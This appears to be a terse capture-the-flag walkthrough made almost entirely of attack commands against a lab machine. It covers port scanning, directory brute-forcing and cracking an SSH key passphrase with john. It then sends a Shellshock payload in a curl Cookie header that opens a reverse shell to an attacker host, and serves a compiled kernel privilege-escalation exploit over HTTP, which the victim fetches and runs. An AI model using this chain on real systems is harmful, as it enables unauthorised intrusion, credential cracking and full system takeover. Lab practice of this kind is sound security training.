nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
This appeared to be a rabbit hole but I found a key and was able to bruteforce the password for it.
chmod 600 id_rsa
/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt
I found a cgi file. i tried checking if it was vulnerable to shellshock which wasn't working but it was vulnerable.
gobuster dir -u http://$VICTIM/cgi-bin/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt,cgi
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/$KALI/4242 0>&1' http://$VICTIM/cgi-bin/test.cgi
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
searchsploit 3.13.0
searchsploit -m linux/local/37292.c
gcc 37292.c -o exploit
python2 -m SimpleHTTPServer 81
cd /tmp/
wget http://10.10.91.55:81/exploit
chmod +x exploit
./exploit
export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin
./exploit
